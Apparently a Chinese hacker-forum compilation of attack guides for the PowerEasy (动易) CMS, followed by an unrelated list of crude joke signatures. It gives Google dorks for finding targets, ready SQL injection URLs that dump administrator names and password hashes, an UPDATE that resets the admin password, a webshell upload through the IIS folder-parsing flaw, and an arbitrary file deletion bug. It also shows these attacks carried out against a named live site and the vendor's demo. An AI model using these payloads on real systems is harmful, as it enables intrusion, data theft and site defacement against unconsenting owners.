动易漏洞

动易漏洞
动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统，目前已有超过10万个以上网站的应用规模，拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。
其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的，我们可以利用构造我们的SQL语句，进行注入。
总是用工具注入，水平也不会提高，而且目前还没有什么工具利用，所以我现在带领各位小黑们进行一次纯手工注入之旅，LET ‘S GO！
首先我们要找一些是动易的网站，动易的文章发布一是http://127.0.0.1/Article/ShowArticle.asp?ArticleID=1 这种形式的，现在就是GOOGLE HACKING时间。
打开GOOGLE，搜索“inurl:Article/ShowArticle.asp?ArticleID=”出现在我们大多都是使用动易的CMS系统的网站了，约有134万的查询结果，使用范围应该是很大的（巨汗ING…）

往后翻几页，我随便打开了个网站。

稍微看了下，是一个提供免费空间的站点，好，我们就从他下手了
我们先来暴用户名，在地址栏里提交
http://www.onlinegf.com/region.asp?Country=Tony&City=tianyi&Province=shit '+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
解释一下：由于Province 过滤不严，Province =shit’后面的就是我们提交的注入语句，
+and+1=2+union+select+username+from+PE_Admin+where+1<2+and+'1'='1
这句的意思就是用UNION查询PE_Admin表（提示：动易的管理员一般是存放PE_Admin表中的，具体情况可以改其他的）在中的用户，即动易的CMS网站管理员的帐号。

如果在“市/县/区/旗”的下拉框中显示的就是他的管理员的帐号，说明网站存在漏洞了
再来暴管理员的密码，在地址栏里输入：
http://www.onlinegf.com/Region.asp?Country=Tony&City=tianyi&Province=shit '+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1
+and+1=2+union+select+password+from+PE_Admin+where+username="Jerry"+and+'1'='1的语句意思就是UNION查询PE_Admin表中Jerry的密码
我们把其中的Jerry改成刚才我们暴的管理员用户。

密码暴了出来，是用MD5加密的16位的
去 www.XMD5.com 查了下，运气很好，密码是纯数字的，SQL版本如果查不出密码的话，可以直接Update直接改掉管理员密码，
语句Update+PE_Admin+set+Password=' 49ba59abbe56e057' where+id=1—
改掉id为1的用户，一般是admin的密码为123456，
或者直接LOG差异备份，直接得到SHELL。我在光盘的放了两篇手工注入的精华文章，有兴趣的朋友可以自己研究。

在主站最下面找到后台
http://www.onlinegf.com/Admin/Admin_login.asp
（改了的话可以GOOLE HACKING）
用得到的密码进入后台，成功了！
小黑们肯定抑制不住心中的喜悦了，别急，精彩还在后面，我们继续来拿SHELL
在后台管理 左边找到“系统设置”，选择下面的“网站频道管理”，点在右边的“下载中心”旁边的“修改”，找到“上传选项”，把“上传文件保存的目录”里改成asp.asp(名字随便，后缀要是ASP的)。保存修改结果。

我们先来做个数据库木马，我用的是旁注小助手”diy.asp”

保存的时候，文件名为”diy.rar”
再打开“下载中心”里的“添加软件”

我们在上传软件上把diy.rar传上去，记下“软件地址”里的路径，我这是”200611/20061125222047379.rar”
我们在地址拦里输入 http://www.onlinegf.com/soft/asp.asp/200611/20061125222047379.rar
哈哈，一匹小马出现拉！
http://www.meon.cn/9.jpg
上传海洋大马得到了WEBSHELL，为了提醒下管理员，只留了个页子。
----------------------------------------------------

 

动易网站管理系统删除任意文件漏洞
发布时间：2007-9-24 12:21:57

这个漏洞对于动易网站管理系统来说，就是致命的了。
此漏洞存在于User目录下的User_saveflash.asp文件中，其第6～22行代码如下所示。

Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonth

objName_FSO = Application("objName_FSO")

ObjInstalled_FSO = IsObjInstalled(objName_FSO)

If ObjInstalled_FSO = True Then

Set fso = Server.CreateObject(objName_FSO)

Else

Response.Write "&&SendFlag=保存 >>> NO"

Response.end

End If

act = trim(request("act"))

//这里是关键

If act="" Then

Call Main()

Else

　　Call CoverColorFile()

　　//如果act不为空，则调用CoverColorFile()函数

End If

set fso = Nothing

下面我们一起来看看函数CoverColorFile()的代码。

Sub CoverColorFile()

//此函数用于生成图像BMP文件

　　Dim whichfile, head, Colortxt, i, rline, badwords

　　//注意whichfile变量

Response.Expires = -9999

Response.AddHeader "Pragma","no-cache"

Response.AddHeader "cache-ctrol","no-cache"

Response.ContentType = "Image/bmp"

//输出图像文件头

head = ChrB(66) & ChrB(77) & ChrB(118) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(54) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(40) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(172) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(130) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(1) & ChrB(0) & ChrB(24) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(64) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0)

　　Response.BinaryWrite head

　　whichfile=trim(request("color_url"))

　　// whichfile由用户提交的color_url而来

　　Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)

　　//以只读方式打开用户提交的变量whichfile，这里取得的是文件

rline = Colortxt.ReadLine //读取文件一行

badwords = split(rline,"|") //以“|”作分隔

Colortxt.Close

　　fso.deleteFile(server.mappath(whichfile))

　　//这句就是漏洞了，此句的作用是删除文件。由于whichfile由用户提交而来，又没有经过任何安全处理，所以便构成漏洞了。如果我们让 color_url=../conn.asp，那么就直接删除conn.asp文件了，同样，我们可以让color_url为站内任一文件，最后，我们可以删除全站的文件。

for i=0 to UBound(badwords)

Response.BinaryWrite to3(badwords(i))

next

End Sub

有了上面的漏洞，我们就一起去测试一下官方网站，看看是否存在此漏洞吧。打开官方演示网站，如图1所示，我们就以动易的Logo作测试吧。查看其路径，发现在images目录下，名为logo.gif，

现在，我们注册一个用户，然后进入会员中心，在URL处填入：。
成功提交之后，返回到首页，现在我们可以看到，官方仍然存大此重大漏洞。官方logo.gif处变成了一个红叉，说明已被删掉。

解决办法为最好不要从外部接收数据，要么就删除代码：fso.deleteFile(server.mappath(whichfile)) 

---------------------------------------------------
动易2006最新两个漏洞的深度讨论 本站原创
 
作者：hackerpu… 文章来源：本站原创 点击数：555 更新时间：2007-6-3 4:34:09
前段时间动易2006出了两个大的漏洞 相信大家一定得到了不少肉鸡吧
其实利用工具已经出来的很多 我想给大家来讨论下手工是怎么入侵的
因为黑客要向原始来学习 才会学到更多知识
一. region.asp文件注入漏洞
漏洞存在region.asp
首先来测试有没有漏洞
我们打开下面的地址
http://网站域名/Region.asp?Country=heipeng.com&Province=hackerpunk    显示正常
http://网站域名/Region.asp?Country=heipeng.com&Province=hackerpunk'   显示不正常
返回错误页面 说明存在漏洞
然后输入其他语句得到管理员帐号和密码
以下是其他几个 注入语句

注入得到管理员帐号
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+AdminName+from+PE_Admin+where+1<2+and+'1'='1
得到指定帐号密码
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+password+from+PE_Admin+where+username="管理员帐号"+and+'1'='1
密码使用md5加过密的 大家可以去论坛下载md5破解工具http://bbs.heipeng.com/read.php?tid-4528-keyword-md5.html
如果得到的不是管理员密码 而是一个普通管理员的密码 大家可以用
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+RndPassword+from+PE_Admin+where+username="管理员帐号"+and+'1'='1
这段代码得到 管理员的RndPassword 我们可以结合cookie欺骗进行入侵 先使用得到的这个帐号登陆 然后在使用cookie修改工具
把用户名替换成管理员的用户名 md5加密后的密码替换成管理员的密码 在把得到的RndPassword 替换上去 直接提交就成管理员帐号了
至于提权 大家可以利用2003的错误解析名为asp文件解析的漏洞来进行提权 在这里我就不详细说了。
2
1.注册帐一个名为heipeng.asp的帐号，一定要是这个不过你要是想改成XXX.asp也没有办法。
2.然后打开这个地址http://域名/user/Upload.asp?dialogtype=UserBlogPic&size=5来上传的一句话木马，尽量使用和数据库捆绑一起的木马
3.用一句话连接器连接木马就行了

我给大家来说一下这两个漏洞的原理 大家一定要有耐心这些对我们的学习很有帮助 光会使用工具根本连个菜鸟都算不上
如果没耐心的可以直接走人了。

我们先来说下region.asp的漏洞
在Region.asp中
Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")
If Err Or TempRs.EOF Then
    ReDim ShowProvince(0, 0)
    Province = Trim(Request.QueryString("Province"))
Else
    ShowProvince = TempRs.GetRows(-1)
End If
Set TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" & Province & "'")
作者对Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province 而不是过滤后的
所以这个Province变量存在漏洞，那么在下面他是直接带入了查询，而Province变量是我们可以随意构造的 也就是我们提交的内容
所以我们就可以构造我们的查询语句了。
但是要进入这个查询的前提是：Err=true 或者 TempRs.EOF 而要达到这2个中的一个
就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")
这条语句在表中查询不到所要找的Country，这样我们就要可以构造，只要提交错误的Country就可以让我们得到我们想要的内容了
比如管理员帐号……所以我们可以构造出了以下语句
Region.asp?Country=heipeng.com&Province=hackerpunk'+and+1=2+union+select+password+from+PE_Admin+where+username="管理员帐号"+and+'1'='1

第二个漏洞 就是2003系统的漏洞了错误解析后缀名为asp文件的漏洞 也就是在一个名为XXX.asp的文件夹下面的所有文件 都按asp格式的文件来执行了
比如我们先用一个网马heipeng.asp 改名为heipeng.rar格式的文件  上传上去 如果服务器发现是
heipeng.asp就会拒绝上传 因为是可能存在危险的格式  服务器一看是rar格式的 一看这是压缩包 就可以进去了 也就上传成功
但是我们打开网页地址的时候输入http://域名/XXX.asp/heipeng.rar 他就会把heipeng.rar按照heipeng.asp来执行了
说简单点就是说heipeng.rar躲到了XXX.asp文件夹的后面就成一大尾巴狼了heipeng.asp了
1、树不要皮,必死无疑;人不要脸,天下无敌 2、骚归骚,骚有骚的贞操;贱归贱,贱有贱的尊严 3、0岁出场亮相,10岁天天向上。20岁远大理想,30岁发奋图强。 40岁基本定向,50岁处处吃 香。60岁打打麻将,70岁处处闲 逛。80岁拉拉家常,90岁挂在墙上! 4、出生时你哭着,所有都笑着;离去时你笑着,所有都哭着 5、站得更高,尿得更远 6、再过几十年,我们来相会,送到火葬场,全部烧成灰,你一堆,我一堆,谁也不认识谁,全部送 到农村做化肥。 7、碰到一个MM个性签名:琴棋书画不会,洗衣做饭嫌累。 8、碰到一个GG个性签名:给我一个姑娘,我可以创造一个民族。 9、碰到一个老陕个性签名:丑女多作怪,黑馍多夹菜。 10、碰到我们老师个性签名:告诉你现在老师很生气,后果是很严重的(在他第N次相亲失败之 后)。 11、碰到一个写手个性签名:也许似乎大概是,然而未必不见得 。 12、碰到一个情圣个性签名:说过的话可以不算,喜欢的人天天要换。 13、碰到班里的睡觉大王个性签名:早中晚三个饱,饭前饭后六个倒 14、在天愿作比翼鸟,在地愿作同圈猪! 15、你放心,看到你我连食欲都没了,还谈什么性欲! 16、五马分尸中——你来一块不? 17、如果早上来得晚一些的话,我想我会喜欢早上的。 18、我不能给你幸福,但可以给你舒服! 19、生活真他妈好玩,因为生活老他妈玩我。 20、佛曰:“前世的500次回眸才换来今生的一次擦肩而过。”我宁愿用来世的一次擦肩而过 来换得今生的500次回眸。 21、我想早恋,但是已经晚了…… 22、天哪!我的衣服又瘦了 23、以后不要在我面前说英文,OK? 24、思想有多远,你就给我滚多远 25、流氓不可怕,就怕流氓有文化。 26、客官请自重,小女子只卖身不卖艺。 27、男人的谎言可以骗女人一夜,女人的谎言可以骗男人一生! 28、水能载舟,亦能煮粥! 29、子在川上曰:“有船多好乎!” 30、诚征小MM,共同来灌水;我灌长江头,君灌长江尾。 31、一见钟情,再而衰,三而竭。 32、一个人并不孤单,想一个人时才孤单 33、生,容易。活,容易。生活不容易。 34、工作QQ,谢绝闲聊,若要强聊,每字伍毛;标点符号,半价收费,千字以上,八折优惠;表情图 片,十块包月,语音视频 ,暂未开通;先款后聊,款到即聊,在线支付,提供发票; 免付月租,单 项收费,节假双休,照常营业;诚征代理, 35、出问题先从自己身上找原因,别一便秘就怪地球没引力。 36、给我织一条围巾,我愿以一生关怀相回报。否则,你就用围巾勒死我吧! 37、男人在不懂的时候装懂,女人则恰好相反 38、为配合今年中国计划生育工作的胜利完成,本人决定暂时不和异性朋友接触,谢谢合作 39、春色满园关不住,我拉红杏出墙来。 40、你以为我会眼睁睁看着你去送死吗?我会闭上眼睛的 41、我以为我很颓废,今天我才知道,原来我早报废了。 42、我喝酒是想把痛苦溺死,但这该死的痛苦却学会了游泳。 43、别人都在假装正经,那我就只有假装不正经啦 44、一只大象问骆驼:‘你的咪咪怎么长在背上？’骆驼说:‘死远点，我不和鸡鸡长在脸上 的东西讲话！ 45、你要为全国人民做三件大事：给珠穆朗玛峰安电梯，给长城贴磁砖，给飞机安倒档。三 件小事：给蚊子戴口罩，给苍蝇戴手套，给蟑螂戴避孕套 46、老婆是操作系统，一但安装卸载十分麻烦；小秘是桌面，只要你有兴趣可以天天更换； 情人是互联网，风光无限花钱不断；小姐是盗版软件，用时记着先杀毒！ 47、听说了吗？前生的5000次回眸才换来今生的擦肩而过，今生象我们这样的好朋友，前 生......什么都没干，光回头了！ 48、本人年方20，人见人爱，花见花开，车见车爆胎！上知天文地理，下知鸡毛蒜皮，每外 出行走，常引美女回头，帅哥跳楼！ 49、想送你玫瑰，可惜价钱太贵；想给你安慰，可我还没学会；想给你下跪，可戒指还在保 险柜。 50、爱空空情空空，自己流浪在街中；人空空钱空空，单身苦命在打工；事空空业空空，想 来想去就发疯；手机空没钱充，生活所迫不轻松；总之四大皆空。 60、有屁不放，憋坏心脏；没屁硬挤，锻炼身体；我要放屁，大家注意，屁声一响，大家鼓 掌！ 晏振宇(332611126) 15:32:49 61、抄书造句写作文--孩子的事大人干。情海泛舟觅知音--大人的事孩子干。烫发做头穿花 衣--女人的事男人干。 62、早起的鸟儿有虫吃，早起的虫儿被鸟吃！ 63、和一MM争论鲸鱼是不是鱼，最后我说“曰本人也带个人字”，她这才同意鲸鱼不是鱼 64、听说女人如衣服，兄弟如手足。回想起来，我竟然七手八脚的裸奔了20年！ 65、穿别人的鞋，走自己的路，让他们打的找去吧。 66、有一个很古老的传说，说是在XX校园内能看到美女的人会长生不老…… 67、不怕虎一样的敌人，就怕猪一样的队友！ 68、水至清则无鱼，人至贱则无敌！ 69、我不是随便的人，我随便起来不是人。 70、今天一群曰本人来我校参观——说实话，这是我第一次看到穿衣服的曰本人！ 71、我很穷，我家的佣人也很穷，我家的园丁也很穷，我家的司机也很穷…… 72、银行收费时说：“这符合国际惯例！”服务时却说：“要考虑中国国情！” 73、骑白马的不一定是王子，他可能是唐僧；带翅膀的也不一定是天使，他可能是鸟人 74、怀才就像怀孕，时间久了才能让人看出来 79、我吞下一颗春药，世界立刻变得性感起来~ 80、如果谈恋爱就是谈恋爱的话，那不是耍流氓吗？ 81、“日本人是人”这句话属于：A.比喻；B.夸张；C.借代；D.拟人。 82、爷爷都是从孙子走过来的…… 85、都是水何必装醇，都是色狼又何必装羊！ 86、所有刻骨铭心的爱都灵魂游离于床上的瞬间~ 87、忍者神龟说：“要想生活过得去，背上就得带点绿！” 88、我趴着睡就强J了地球，我躺着睡就强J了整个宇宙！ 90、当白天又一次把黑夜按翻在床上的时候，太阳就出生了…… 91、男人只分两种：一种是好色，另一种是十分好色！ 91、①师太，你就从了老衲吧……②老衲失礼了，师太该你了～③师太，你就饶了老衲吧！ ④阿尼陀佛，老衲射不出-_-b 94、生活把我奸了，我把生活阉了…… 95、根据荷尔蒙活动的时间规律得出结论：晨练不如早操！ 96、老天，你让夏天和冬天同房了吧？生出这鬼天气！ 97、不要在一棵树上吊死，在附近几棵树上多试试死几次~ 98、马化腾私下说：“学十年语文没有聊半年QQ效果好！” 99、大便的时候要留一半，免得饿得快~ 102、论男人给女人讲多么多么浪漫的童话故事，里面终不过围绕一个字：床